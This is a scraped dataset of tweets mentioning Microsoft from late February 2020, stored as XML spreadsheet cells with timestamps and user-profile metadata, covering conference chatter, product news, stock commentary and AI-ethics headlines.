CORSO ECDL BASE - WORD
#aica #applicazioni #apps #computer #doc #document #ecdl #elaborazione #input #microsoft #microsoft_office_suite #modulo_3 #office #output #save #software #suite #texteditor #word #wordprocessing #icdl
https://t.co/miXfvkAQFc https://t.co/Iia4vYORnJ</t>
  </si>
  <si>
    <t>Sat Feb 29 10:42:07 +0000 2020</t>
  </si>
  <si>
    <t>https://t.co/77k5LabwZd
CORSO ECDL BASE - WORD
#aica #applicazioni #apps #computer #doc #document #ecdl #elaborazione #input #microsoft #microsoft_office_suite #modulo_3 #office #output #save #software #suite #texteditor #word #wordprocessing #icdl
https://t.co/miXfvkAQFc https://t.co/Ua2HtB4bSN</t>
  </si>
  <si>
    <t>Sat Feb 29 10:41:57 +0000 2020</t>
  </si>
  <si>
    <t>https://t.co/77k5LabwZd
CORSO ECDL BASE - WORD
#aica #applicazioni #apps #computer #doc #document #ecdl #elaborazione #input #microsoft #microsoft_office_suite #modulo_3 #office #output #save #software #suite #texteditor #word #wordprocessing #icdl
https://t.co/miXfvkAQFc https://t.co/JW40WfzYcx</t>
  </si>
  <si>
    <t>Sat Feb 29 10:37:40 +0000 2020</t>
  </si>
  <si>
    <t>Next @scottishsummit session coming up "Building the perfect #Microsoft365 Tenant" 11am in Room 6- see you there! #ss2020 #Office365 #MicrosoftTeams #SharePoint #Microsoft https://t.co/oUEq7R1ctC</t>
  </si>
  <si>
    <t>Sat Feb 29 10:27:28 +0000 2020</t>
  </si>
  <si>
    <t>How can we let the #Vatican, #microsoft and #ibm draft #ethical guidelines for #ai? 
https://t.co/9V7A0anb0w</t>
  </si>
  <si>
    <t>{'id': 414654980, 'id_str': '414654980', 'name': 'Elisa Bruno ðŸ’¾', 'screen_name': 'ElisainBrussels', 'location': 'Brussels, Bruxelles', 'description': 'Mother of boys, comms professional, IT lover &amp; data privacy nerd in #Brussels. Also into #DIYprojects &amp;   #politics. Work @etui_org, views mine. RTâ‰ endorsement', 'url': 'https://t.co/d9JJ25EeJ0', 'entities': {'url': {'urls': [{'url': 'https://t.co/d9JJ25EeJ0', 'expanded_url': 'https://www.linkedin.com/in/elisabruno', 'display_url': 'linkedin.com/in/elisabruno', 'indices': [0, 23]}]}, 'description': {'urls': []}}, 'protected': False, 'followers_count': 725, 'friends_count': 1557, 'listed_count': 95, 'created_at': 'Thu Nov 17 09:59:12 +0000 2011', 'favourites_count': 909, 'utc_offset': None, 'time_zone': None, 'geo_enabled': True, 'verified': False, 'statuses_count': 2908, 'lang': None, 'contributors_enabled': False, 'is_translator': False, 'is_translation_enabled': False, 'profile_background_color': '58D2E8', 'profile_background_image_url': 'http://abs.twimg.com/images/themes/theme17/bg.gif', 'profile_background_image_url_https': 'https://abs.twimg.com/images/themes/theme17/bg.gif', 'profile_background_tile': False, 'profile_image_url': 'http://pbs.twimg.com/profile_images/641363631729307648/YjVqwTDW_normal.jpg', 'profile_image_url_https': 'https://pbs.twimg.com/profile_images/641363631729307648/YjVqwTDW_normal.jpg', 'profile_banner_url': 'https://pbs.twimg.com/profile_banners/414654980/1499284583', 'profile_link_color': '89C9FA', 'profile_sidebar_border_color': '52B30A', 'profile_sidebar_fill_color': 'F19411', 'profile_text_color': 'FFF7F7', 'profile_use_background_image': True, 'has_extended_profile': False, 'default_profile': False, 'default_profile_image': False, 'following': None, 'follow_request_sent': None, 'notifications': None, 'translator_type': 'none'}</t>
  </si>
  <si>
    <t>Sat Feb 29 10:25:45 +0000 2020</t>
  </si>
  <si>
    <t>Who says competitors can't be friends!! Always love catching up with Liam O'Brien!! Although he wants to keep it a secret... Sorry mate!!! @scottishsummit 
#SS2020 #ScottishSummit #Dynamics365 #PowerAddicts #TDG #Dynamics #PowerPlatform #PowerApps #Microsoft #Microsoft365 #Azure https://t.co/EKxewNsbpx</t>
  </si>
  <si>
    <t>Sat Feb 29 10:22:48 +0000 2020</t>
  </si>
  <si>
    <t>Its #payday #weekend why not treat yourself,we have some great deals in store today #Xbox #Microsoft https://t.co/ddRnsRO7bG</t>
  </si>
  <si>
    <t>{'id': 580016758, 'id_str': '580016758', 'name': 'GAME Doncaster', 'screen_name': 'GAMEDoncaster', 'location': 'Doncaster, South Yorkshire, UK', 'description': 'Greetings! Welcome to the GAME Doncaster twitter page. Follow us for the latest news, gaming talk and offers!', 'url': 'https://t.co/NwRgrDtzWw', 'entities': {'url': {'urls': [{'url': 'https://t.co/NwRgrDtzWw', 'expanded_url': 'http://www.facebook.com/GAMEDoncaster', 'display_url': 'facebook.com/GAMEDoncaster', 'indices': [0, 23]}]}, 'description': {'urls': []}}, 'protected': False, 'followers_count': 2114, 'friends_count': 567, 'listed_count': 58, 'created_at': 'Mon May 14 16:20:47 +0000 2012', 'favourites_count': 3126, 'utc_offset': None, 'time_zone': None, 'geo_enabled': True, 'verified': False, 'statuses_count': 13431,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'http://pbs.twimg.com/profile_images/1189641426004594689/CJRmnPk2_normal.jpg', 'profile_image_url_https': 'https://pbs.twimg.com/profile_images/1189641426004594689/CJRmnPk2_normal.jpg', 'profile_banner_url': 'https://pbs.twimg.com/profile_banners/580016758/1577975264',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</si>
  <si>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10:22:47 +0000 2020</t>
  </si>
  <si>
    <t>Linkedin has confirmed that LinkedIn Stories are coming soon like #Snapchat and #Instagram. LinkedIn is testing a Stories feature to improve conversations on the platform.
#LinkedIn #techcresendo #stories #technews #JobSearch #technology #Microsoft 
https://t.co/AAJKTNe9WU</t>
  </si>
  <si>
    <t>{'id': 3635401280, 'id_str': '3635401280', 'name': 'techcresendo', 'screen_name': 'techcresendo', 'location': '', 'description': 'We provide you with all the hottest &amp; latest #technology #news, #gadget #reviews, #Digital news, new releases straight from the #tech industry.', 'url': 'https://t.co/qtHiX2RxF0', 'entities': {'url': {'urls': [{'url': 'https://t.co/qtHiX2RxF0', 'expanded_url': 'http://www.techcresendo.com', 'display_url': 'techcresendo.com', 'indices': [0, 23]}]}, 'description': {'urls': []}}, 'protected': False, 'followers_count': 1139, 'friends_count': 0, 'listed_count': 80, 'created_at': 'Mon Sep 21 07:26:16 +0000 2015', 'favourites_count': 54, 'utc_offset': None, 'time_zone': None, 'geo_enabled': True, 'verified': False, 'statuses_count': 1395,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'http://pbs.twimg.com/profile_images/655751263213088768/9wyi2kpQ_normal.png', 'profile_image_url_https': 'https://pbs.twimg.com/profile_images/655751263213088768/9wyi2kpQ_normal.png', 'profile_banner_url': 'https://pbs.twimg.com/profile_banners/3635401280/1506930571',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</si>
  <si>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10:14:17 +0000 2020</t>
  </si>
  <si>
    <t>$MSFT's Aroon indicator drops into Downtrend on February 13, 2020. View odds for this and other indicators: https://t.co/SOKEc2ppaM #Microsoft #stockmarket #stock #technicalanalysis #money #trading #investing #daytrading #news #today https://t.co/7Pjeek4ODy</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</si>
  <si>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</si>
  <si>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10:13:26 +0000 2020</t>
  </si>
  <si>
    <t>Whoooop! @vabgujral you were 300th follower. If you send me a PM with your address I'll send you a beer.
Or we drink one together on the next #Microsoft event</t>
  </si>
  <si>
    <t>{'id': 821438220378533893, 'id_str': '821438220378533893', 'name': 'Azurekid ðŸš€ 42 and rocking', 'screen_name': 'DijkmanRogier', 'location': 'in the Cloud', 'description': "Senior #Azure DevOps Consultant @InsightNL, Father, Marathon Runner, #PowerShell, #ARM, #DevOps and #Space Enthusiast,\nCrazy and inspiring, so I've been told", 'url': 'https://t.co/hNXvBPz7yW', 'entities': {'url': {'urls': [{'url': 'https://t.co/hNXvBPz7yW', 'expanded_url': 'https://azurekid.blog', 'display_url': 'azurekid.blog', 'indices': [0, 23]}]}, 'description': {'urls': []}}, 'protected': False, 'followers_count': 313, 'friends_count': 328, 'listed_count': 11, 'created_at': 'Tue Jan 17 19:25:08 +0000 2017', 'favourites_count': 575, 'utc_offset': None, 'time_zone': None, 'geo_enabled': True, 'verified': False, 'statuses_count': 762, 'lang': None, 'contributors_enabled': False, 'is_translator': False, 'is_translation_enabled': False, 'profile_background_color': 'F5F8FA', 'profile_background_image_url': None, 'profile_background_image_url_https': None, 'profile_background_tile': False, 'profile_image_url': 'http://pbs.twimg.com/profile_images/1224849212552241152/XXGyyPry_normal.jpg', 'profile_image_url_https': 'https://pbs.twimg.com/profile_images/1224849212552241152/XXGyyPry_normal.jpg', 'profile_banner_url': 'https://pbs.twimg.com/profile_banners/821438220378533893/1571460060',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</si>
  <si>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10:13:13 +0000 2020</t>
  </si>
  <si>
    <t>Pledging that his foundation will donate up to $100 million to poor countries in #Africa and #SouthAsia, #Microsoft co-founder #BillGates has also urged developed countries to help less wealthy nations prepare and fight the #coronavirus.
https://t.co/jTGtGKV4DC</t>
  </si>
  <si>
    <t>{'id': 196965482, 'id_str': '196965482', 'name': 'Business Recorder', 'screen_name': 'brecordernews', 'location': 'Karachi-Pakistan', 'description': 'Business Recorder is the biggest financial daily in Pakistan and the first such publication to be published in the Muslim world', 'url': 'http://t.co/kjxwlV7Cef', 'entities': {'url': {'urls': [{'url': 'http://t.co/kjxwlV7Cef', 'expanded_url': 'http://www.brecorder.com', 'display_url': 'brecorder.com', 'indices': [0, 22]}]}, 'description': {'urls': []}}, 'protected': False, 'followers_count': 33461, 'friends_count': 55, 'listed_count': 461, 'created_at': 'Thu Sep 30 10:06:28 +0000 2010', 'favourites_count': 473, 'utc_offset': None, 'time_zone': None, 'geo_enabled': True, 'verified': False, 'statuses_count': 126912,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'http://pbs.twimg.com/profile_images/979296891065323521/ypzVEIRk_normal.jpg', 'profile_image_url_https': 'https://pbs.twimg.com/profile_images/979296891065323521/ypzVEIRk_normal.jpg', 'profile_banner_url': 'https://pbs.twimg.com/profile_banners/196965482/1535521731', 'profile_link_color': '9266CC', 'profile_sidebar_border_color': '707070', 'profile_sidebar_fill_color': '2E2E2E', 'profile_text_color': 'ABABAB', 'profile_use_background_image': True, 'has_extended_profile': True, 'default_profile': False, 'default_profile_image': False, 'following': None, 'follow_request_sent': None, 'notifications': None, 'translator_type': 'none'}</t>
  </si>
  <si>
    <t>Sat Feb 29 10:10:58 +0000 2020</t>
  </si>
  <si>
    <t>By me @Forbes and @ForbesEurope: #TFW having the latest #Windows10 update puts you in the #cybercrime crosshairs instead of moving you out of them.
#infosec #CyberSecurity #Microsoft #trickbot #cyberawareness #technews
https://t.co/WtuMeChHmO</t>
  </si>
  <si>
    <t>{'id': 767362, 'id_str': '767362', 'name': 'Davey Winder', 'screen_name': 'happygeek', 'location': 'West Yorkshire, UK', 'description': 'Word Punk\n\nSenior Contributor @Forbes\n\ndavey@happygeek.com\n\nAlso: @itpro, @pcpro, @SCMagazineUK, @InfosecurityMag, @digitalhealth2, @Raconteur', 'url': 'https://t.co/N4q0txpFqE', 'entities': {'url': {'urls': [{'url': 'https://t.co/N4q0txpFqE', 'expanded_url': 'http://authory.com/DaveyWinder', 'display_url': 'authory.com/DaveyWinder', 'indices': [0, 23]}]}, 'description': {'urls': []}}, 'protected': False, 'followers_count': 9503, 'friends_count': 2589, 'listed_count': 399, 'created_at': 'Mon Feb 12 13:20:41 +0000 2007', 'favourites_count': 2931, 'utc_offset': None, 'time_zone': None, 'geo_enabled': True, 'verified': False, 'statuses_count': 8732,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'http://pbs.twimg.com/profile_images/1047911296841203712/b9Ljhl5v_normal.jpg', 'profile_image_url_https': 'https://pbs.twimg.com/profile_images/1047911296841203712/b9Ljhl5v_normal.jpg', 'profile_banner_url': 'https://pbs.twimg.com/profile_banners/767362/1469085871', 'profile_link_color': '0856E9',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</si>
  <si>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Sat Feb 29 10:00:34 +0000 2020</t>
  </si>
  <si>
    <t xml:space="preserve"> Will the #virus  cause a #recession  We look at the events that have shaped markets this week  https://t.co/Zegu4fuImW
#coronavirus #airlines #China #Italy #Brexit #Mastercard #Marriott #Microsoft #tech #IPOs #Barclays #Disney #VirginGalactic https://t.co/mACGPRHbDG</t>
  </si>
  <si>
    <t>Sat Feb 29 10:00:12 +0000 2020</t>
  </si>
  <si>
    <t>Did you know that we are a Microsoft Registered Refurbisher?
- Genuine Microsoft Windows software preinstalled
- Computers professionally refurbished
- Free support available online &amp;amp; over the phone
- Affordable pricing
Contact us on 0800 054 6363
#PCBITZ #Microsoft https://t.co/T5EY8SflCs</t>
  </si>
  <si>
    <t>{'id': 1261767210, 'id_str': '1261767210', 'name': 'PCBITZ', 'screen_name': 'PCBITZ', 'location': 'Cannock, Staffordshire', 'description': 'We are specialists in hard to find and legacy computer, laptop and server bits. Whatever you need, give us a try!\n\n0800 054 6363 \nsales@pcbitz.com', 'url': 'https://t.co/IckFD0TALV', 'entities': {'url': {'urls': [{'url': 'https://t.co/IckFD0TALV', 'expanded_url': 'http://www.pcbitz.com', 'display_url': 'pcbitz.com', 'indices': [0, 23]}]}, 'description': {'urls': []}}, 'protected': False, 'followers_count': 185, 'friends_count': 2640, 'listed_count': 1, 'created_at': 'Tue Mar 12 11:45:16 +0000 2013', 'favourites_count': 328, 'utc_offset': None, 'time_zone': None, 'geo_enabled': True, 'verified': False, 'statuses_count': 443, 'lang': None, 'contributors_enabled': False, 'is_translator': False, 'is_translation_enabled': False, 'profile_background_color': 'F58321', 'profile_background_image_url': 'http://abs.twimg.com/images/themes/theme1/bg.png', 'profile_background_image_url_https': 'https://abs.twimg.com/images/themes/theme1/bg.png', 'profile_background_tile': False, 'profile_image_url': 'http://pbs.twimg.com/profile_images/378800000507614398/12ddd898673387ef2464404a192920c9_normal.png', 'profile_image_url_https': 'https://pbs.twimg.com/profile_images/378800000507614398/12ddd898673387ef2464404a192920c9_normal.png', 'profile_banner_url': 'https://pbs.twimg.com/profile_banners/1261767210/1566290567', 'profile_link_color': '16A751',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</si>
  <si>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10:00:09 +0000 2020</t>
  </si>
  <si>
    <t>Microsofts new Office app arrives on iOS and Android with mobile-friendly features.
#microsoft #microsoftwindows #windowsupdate #microsoftdynamics365 #microsoftedge #microsoft365 #office365 #office #android #ios #mobileapp #apps #applicationdevelopment #word #excel #powerpoint https://t.co/BfYWkIJkU3</t>
  </si>
  <si>
    <t>Sat Feb 29 09:57:25 +0000 2020</t>
  </si>
  <si>
    <t>Use the right tool for you #microsoft #graph 
Thanks for the session!
#spsbre @plemich https://t.co/HXWjdvHDkC</t>
  </si>
  <si>
    <t>Sat Feb 29 09:50:30 +0000 2020</t>
  </si>
  <si>
    <t>How Microsoft connects high-quality, discoverable data - IT Showcase Blog https://t.co/CJ0B6j60AQ #Microsoft #datos</t>
  </si>
  <si>
    <t>{'id': 259185422, 'id_str': '259185422', 'name': 'JosÃ© Vicente Moreno', 'screen_name': 'jvmorenog', 'location': 'Albacete, Spain', 'description': 'Tremendamente curioso, siempre quiero aprender, adicto a pensar y loco de la ciencia y tecnologia', 'url': 'http://t.co/McSFkFyO', 'entities': {'url': {'urls': [{'url': 'http://t.co/McSFkFyO', 'expanded_url': 'http://reflexiones-e-intereses-jvmg.blogspot.com', 'display_url': 'â€¦exiones-e-intereses-jvmg.blogspot.com', 'indices': [0, 20]}]}, 'description': {'urls': []}}, 'protected': False, 'followers_count': 1155, 'friends_count': 1072, 'listed_count': 165, 'created_at': 'Tue Mar 01 09:38:45 +0000 2011', 'favourites_count': 180, 'utc_offset': None, 'time_zone': None, 'geo_enabled': True, 'verified': False, 'statuses_count': 14481, 'lang': None, 'contributors_enabled': False, 'is_translator': False, 'is_translation_enabled': False, 'profile_background_color': '3E96C2', 'profile_background_image_url': 'http://abs.twimg.com/images/themes/theme14/bg.gif', 'profile_background_image_url_https': 'https://abs.twimg.com/images/themes/theme14/bg.gif', 'profile_background_tile': False, 'profile_image_url': 'http://pbs.twimg.com/profile_images/1258448683/JOSE2_normal.JPG', 'profile_image_url_https': 'https://pbs.twimg.com/profile_images/1258448683/JOSE2_normal.JPG', 'profile_banner_url': 'https://pbs.twimg.com/profile_banners/259185422/1392217880', 'profile_link_color': 'FA743E',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</si>
  <si>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Sat Feb 29 09:48:59 +0000 2020</t>
  </si>
  <si>
    <t>I challenge any key note speaker to get a better entrance than @JonJLevesque at the @scottishsummit ... Awesome start to the day!! 
#ScottishSummit #SS2020 #PowerAddicts #TDG #Microsoft #Dynamics365 #Office365 #Azure #PowerPlatform https://t.co/yFwaml7VlA</t>
  </si>
  <si>
    <t>Sat Feb 29 09:47:01 +0000 2020</t>
  </si>
  <si>
    <t>FREE EVENT: Codeless AI Apps in Microsoft Office 365 Powerapps
In collaboration with @CloudstreetC @ntpowerplatform 
RSVP https://t.co/ufw1yx6g9y  
https://t.co/Cm3x8FdkI9 
#powerbi #microsoft #powerapps #dashboard #businessintelligence #data #dataanalytics  #microsoftpowerbi https://t.co/aVz6q7ZdKa</t>
  </si>
  <si>
    <t>Sat Feb 29 09:46:37 +0000 2020</t>
  </si>
  <si>
    <t>IBM and Microsoft the first companies to sign the 'Rome Call for AI Ethics'
https://t.co/6vbzSDKD2r
#AI #ethics #IBM #Microsoft #Vatican #Catholic #Church  #ethical #guidelines #tech #bigtech #transparency #inclusion #responsibility #impartiality #reliability #security #privacy https://t.co/PTpLZbKgpo</t>
  </si>
  <si>
    <t>{'id': 4060071683, 'id_str': '4060071683', 'name': 'Kopjes Kattenoppas', 'screen_name': 'Kattenkopjes', 'location': 'Amsterdam, Noord-Holland', 'description': 'People think mathematics is complicated. Mathematics is the simple bit. But what makes a cat? How do you define  a cat? I have no idea. (John Horton Conway)', 'url': 'https://t.co/oMZCuEFOOh', 'entities': {'url': {'urls': [{'url': 'https://t.co/oMZCuEFOOh', 'expanded_url': 'http://www.kopjes-kattenoppas.nl', 'display_url': 'kopjes-kattenoppas.nl', 'indices': [0, 23]}]}, 'description': {'urls': []}}, 'protected': False, 'followers_count': 1093, 'friends_count': 1054, 'listed_count': 789, 'created_at': 'Wed Oct 28 10:50:46 +0000 2015', 'favourites_count': 3562, 'utc_offset': None, 'time_zone': None, 'geo_enabled': False, 'verified': False, 'statuses_count': 12567, 'lang': None, 'contributors_enabled': False, 'is_translator': False, 'is_translation_enabled': False, 'profile_background_color': 'FAFAFA', 'profile_background_image_url': 'http://abs.twimg.com/images/themes/theme1/bg.png', 'profile_background_image_url_https': 'https://abs.twimg.com/images/themes/theme1/bg.png', 'profile_background_tile': False, 'profile_image_url': 'http://pbs.twimg.com/profile_images/669103897869422592/VgZSsXA5_normal.jpg', 'profile_image_url_https': 'https://pbs.twimg.com/profile_images/669103897869422592/VgZSsXA5_normal.jpg', 'profile_banner_url': 'https://pbs.twimg.com/profile_banners/4060071683/1446031147', 'profile_link_color': '021670',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</si>
  <si>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Sat Feb 29 09:44:41 +0000 2020</t>
  </si>
  <si>
    <t>@JonJLevesque doing a great job at #scottishsummit #Microsoft #PowerApps https://t.co/Pg578PwL2N</t>
  </si>
  <si>
    <t>{'id': 314725083, 'id_str': '314725083', 'name': 'Stephen McGuigan', 'screen_name': 'bigsteef', 'location': 'Hamilton (near Glasgow)', 'description': 'A Microsoft technology specialist. Main specialisms include SCCM and Hyper-V and Azure', 'url': None, 'entities': {'description': {'urls': []}}, 'protected': False, 'followers_count': 91, 'friends_count': 268, 'listed_count': 9, 'created_at': 'Fri Jun 10 18:16:23 +0000 2011', 'favourites_count': 104, 'utc_offset': None, 'time_zone': None, 'geo_enabled': True, 'verified': False, 'statuses_count': 534,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'http://pbs.twimg.com/profile_images/1401439673/image_normal.jpg', 'profile_image_url_https': 'https://pbs.twimg.com/profile_images/1401439673/image_normal.jpg',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</si>
  <si>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09:41:57 +0000 2020</t>
  </si>
  <si>
    <t>When the game is Trash but is created by microsoft.
#xbox #xflop #microsoft #XboxSeriesX #XboxGamePass  
#PS4  #PS5 #Sony #Playstation4 https://t.co/tP75hD1yDc</t>
  </si>
  <si>
    <t>Sat Feb 29 09:37:17 +0000 2020</t>
  </si>
  <si>
    <t>New to Twitter, so to generate activity on my feed, I might regurgitate some material from my LinkedIn profile. All things #Microsoft #Azure</t>
  </si>
  <si>
    <t>Sat Feb 29 09:36:57 +0000 2020</t>
  </si>
  <si>
    <t>$MSFT still firmly in buy on our system despite #COVID2019 &amp;amp; didn't hit the monthly S3. See chart. Key: above the cloud "In Buy" below "In Sell" #Coronavid19 #NASDAQ #fintech #Microsoft #stocks #StockMarketCrash2020 #trading #investment #fintwit #BlackSwan https://t.co/coxS7Yrsml</t>
  </si>
  <si>
    <t>{'id': 1079749795823214594, 'id_str': '1079749795823214594', 'name': 'The Flying Stocksman', 'screen_name': 'flyingstocksman', 'location': 'Manchester, England', 'description': 'Simple long/short investment strategy with strict risk management. \nDisciple of Brian Marber and Peter Brandt \nNot advice\nHope to inform', 'url': None, 'entities': {'description': {'urls': []}}, 'protected': False, 'followers_count': 594, 'friends_count': 960, 'listed_count': 10, 'created_at': 'Mon Dec 31 14:43:06 +0000 2018', 'favourites_count': 241, 'utc_offset': None, 'time_zone': None, 'geo_enabled': False, 'verified': False, 'statuses_count': 2479, 'lang': None, 'contributors_enabled': False, 'is_translator': False, 'is_translation_enabled': False, 'profile_background_color': 'F5F8FA', 'profile_background_image_url': None, 'profile_background_image_url_https': None, 'profile_background_tile': False, 'profile_image_url': 'http://pbs.twimg.com/profile_images/1079750998044889090/uq-c6v7y_normal.jpg', 'profile_image_url_https': 'https://pbs.twimg.com/profile_images/1079750998044889090/uq-c6v7y_normal.jpg', 'profile_banner_url': 'https://pbs.twimg.com/profile_banners/1079749795823214594/1577050295',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</si>
  <si>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09:35:07 +0000 2020</t>
  </si>
  <si>
    <t>Looking to learn more about #Microsoft #Azure? Awesome. 
Check out our blog to find some of the best training options to help keep you up to speed with the #cloud. 
https://t.co/M1EDa7TjWD https://t.co/J3tiEDrJUz</t>
  </si>
  <si>
    <t>Sat Feb 29 09:32:18 +0000 2020</t>
  </si>
  <si>
    <t>First participation in #365saturday #d365 #dynamics365 #Microsoft #sto #teamICT https://t.co/J2i8rsRLhg</t>
  </si>
  <si>
    <t>{'id': 573348483, 'id_str': '573348483', 'name': 'Ismail Mifrah', 'screen_name': 'IsmailMifrah', 'location': '', 'description': 'A gunner / Diver _ official ac', 'url': None, 'entities': {'description': {'urls': []}}, 'protected': False, 'followers_count': 636, 'friends_count': 1962, 'listed_count': 5, 'created_at': 'Mon May 07 03:40:19 +0000 2012', 'favourites_count': 12069, 'utc_offset': None, 'time_zone': None, 'geo_enabled': True, 'verified': False, 'statuses_count': 9087,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'http://pbs.twimg.com/profile_images/810194222934532097/ol-qrr8k_normal.jpg', 'profile_image_url_https': 'https://pbs.twimg.com/profile_images/810194222934532097/ol-qrr8k_normal.jpg', 'profile_banner_url': 'https://pbs.twimg.com/profile_banners/573348483/1482000395',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</si>
  <si>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09:30:02 +0000 2020</t>
  </si>
  <si>
    <t>Access scholarships to help you teach CS  #WomenInSTEM #WomenInScience #100daysofcode #girlswhocode #technology #tech #education #Microsoft https://t.co/RGOmjdnIfh</t>
  </si>
  <si>
    <t>Sat Feb 29 09:30:00 +0000 2020</t>
  </si>
  <si>
    <t>Africas technology start-up scene is vibrant and growing fast, yet there seems to be a short supply of women led startups.    #ATSKGL #IWD2020.  #WomenTechMakers  #stem #microsoft #WomenInSTEM #WomenInScience #100daysofcode https://t.co/5w4WYqSclK</t>
  </si>
  <si>
    <t>Sat Feb 29 09:25:42 +0000 2020</t>
  </si>
  <si>
    <t>Why '#TheInvisibleMan' 
#Director #LeighWhannell Defied Test #Screening Notes https://t.co/iiNnzPGFzC 
#bigdata 
#Twitter #socialmedia 
#dliSabeth 
#Movies #apple #Microsoft
@Chidambara09 #linux #china #usa #google #youtube  #fashion 
#actress #model #modelling #pop</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</si>
  <si>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927182,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</si>
  <si>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09:25:27 +0000 2020</t>
  </si>
  <si>
    <t>#Microsoft reveals the user feedback that helped shaped Windows 10 #MicrosoftWindows #Pat https://t.co/NgpfpIi6OQ https://t.co/uTqAhv9lYX</t>
  </si>
  <si>
    <t>Sat Feb 29 09:25:20 +0000 2020</t>
  </si>
  <si>
    <t>Heading to the @scottishsummit , just round the corner. Hope to see some good stuff, even on my day off #Azure #Microsoft</t>
  </si>
  <si>
    <t>{'id': 20616680, 'id_str': '20616680', 'name': 'Ackey', 'screen_name': 'AckeyGraham', 'location': 'The Weege', 'description': '', 'url': None, 'entities': {'description': {'urls': []}}, 'protected': False, 'followers_count': 173, 'friends_count': 563, 'listed_count': 0, 'created_at': 'Wed Feb 11 19:22:26 +0000 2009', 'favourites_count': 964, 'utc_offset': None, 'time_zone': None, 'geo_enabled': True, 'verified': False, 'statuses_count': 2514,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'http://pbs.twimg.com/profile_images/1168917149982887937/vWzOfwbp_normal.jpg', 'profile_image_url_https': 'https://pbs.twimg.com/profile_images/1168917149982887937/vWzOfwbp_normal.jpg', 'profile_banner_url': 'https://pbs.twimg.com/profile_banners/20616680/1529519756',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</si>
  <si>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09:14:37 +0000 2020</t>
  </si>
  <si>
    <t>Kinging is all about setting goals and achieving them.
#awscertification #aws #acloudguru #amazonwebservices #amazonwebservicesaws #awstraining #certifications #certification #microsoftazure #microsoft #microsoft365 #microsoftteams #microsoftcloud #micro...https://t.co/KLCucrZlfJ</t>
  </si>
  <si>
    <t>{'id': 2446939366, 'id_str': '2446939366', 'name': 'Innocent Sax', 'screen_name': 'Innocent_Sax', 'location': 'Tel Aviv Israel', 'description': 'Innocent Sulaiman Netshitadi is an African entrepreneur and philanthropist. He is a Co-founder &amp; Independent Director of the Nit Photography Group Middle East.', 'url': 'https://t.co/WVIH0qH786', 'entities': {'url': {'urls': [{'url': 'https://t.co/WVIH0qH786', 'expanded_url': 'https://www.facebook.com/NitInternationalPhotographyGroup/', 'display_url': 'facebook.com/NitInternationâ€¦', 'indices': [0, 23]}]}, 'description': {'urls': []}}, 'protected': False, 'followers_count': 189, 'friends_count': 1042, 'listed_count': 0, 'created_at': 'Sun Mar 30 11:42:43 +0000 2014', 'favourites_count': 12, 'utc_offset': None, 'time_zone': None, 'geo_enabled': True, 'verified': False, 'statuses_count': 148,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'http://pbs.twimg.com/profile_images/1108329518828277761/KvgZ3WX4_normal.jpg', 'profile_image_url_https': 'https://pbs.twimg.com/profile_images/1108329518828277761/KvgZ3WX4_normal.jpg', 'profile_banner_url': 'https://pbs.twimg.com/profile_banners/2446939366/1553081325',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</si>
  <si>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09:14:07 +0000 2020</t>
  </si>
  <si>
    <t>And so it begins! @scottishsummit
We are ready for you!
#scottishsummit #solgari #Microsoft 
Looking forward to what the day had to offer! https://t.co/xZRWz3yOeF</t>
  </si>
  <si>
    <t>Sat Feb 29 09:12:26 +0000 2020</t>
  </si>
  <si>
    <t>#AWS for citizen developers?
Will this be the next fight between #Amazon and #Microsoft? #PowerAutomate is already awesome, so I'm curious what Amazon will release soon.
https://t.co/lR2d0CF3yB</t>
  </si>
  <si>
    <t>{'id': 1220264214373326848, 'id_str': '1220264214373326848', 'name': 'Stefan Fried', 'screen_name': 'fried_stefan', 'location': 'Vienna', 'description': '#OfficeExpert Product Manager @panagenda. Loving husband &amp; father. Lecturer @FHdesBFIWien. Thrills incl. talking collaboration &amp; analytics, watching Formula One', 'url': 'https://t.co/h61v92jJQr', 'entities': {'url': {'urls': [{'url': 'https://t.co/h61v92jJQr', 'expanded_url': 'http://www.panagenda.com', 'display_url': 'panagenda.com', 'indices': [0, 23]}]}, 'description': {'urls': []}}, 'protected': False, 'followers_count': 27, 'friends_count': 13, 'listed_count': 0, 'created_at': 'Thu Jan 23 08:37:34 +0000 2020', 'favourites_count': 26, 'utc_offset': None, 'time_zone': None, 'geo_enabled': False, 'verified': False, 'statuses_count': 63, 'lang': None, 'contributors_enabled': False, 'is_translator': False, 'is_translation_enabled': False, 'profile_background_color': 'F5F8FA', 'profile_background_image_url': None, 'profile_background_image_url_https': None, 'profile_background_tile': False, 'profile_image_url': 'http://pbs.twimg.com/profile_images/1220264453071101952/XCh9m58R_normal.jpg', 'profile_image_url_https': 'https://pbs.twimg.com/profile_images/1220264453071101952/XCh9m58R_normal.jpg',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</si>
  <si>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09:11:25 +0000 2020</t>
  </si>
  <si>
    <t>#Microsoft: This is how Windows 10 has been changed by Windows Insider feedback | #ZDNet #MicrosoftWindows https://t.co/1T0yEV9yzs https://t.co/hRDIzRSG5X</t>
  </si>
  <si>
    <t>Sat Feb 29 09:05:11 +0000 2020</t>
  </si>
  <si>
    <t>@scottishsummit kickoff Mark Christie @Bearded365Guy #SS2020 #Office365 #Microsoft365 #MicrosoftTeams #SharePoint #PowerPlatform #Microsoft #Glasgow https://t.co/klBsItZ5Ez</t>
  </si>
  <si>
    <t>Sat Feb 29 09:02:33 +0000 2020</t>
  </si>
  <si>
    <t>SocialChorus Extends Office 365 Integration to Microsoft Teams 
#HR #HumanResources #Communication #HRTech #HRSolutions #HRSoftwares #HRTechnology #Microsoft #Teams #Content 
https://t.co/YnYLGnfi4F via @HCMTech</t>
  </si>
  <si>
    <t>Sat Feb 29 09:02:02 +0000 2020</t>
  </si>
  <si>
    <t>All set up and ready for the @scottishsummit keynote #ss20202 @SkylinesAcademy #microsoft https://t.co/jVA9QuNUPK</t>
  </si>
  <si>
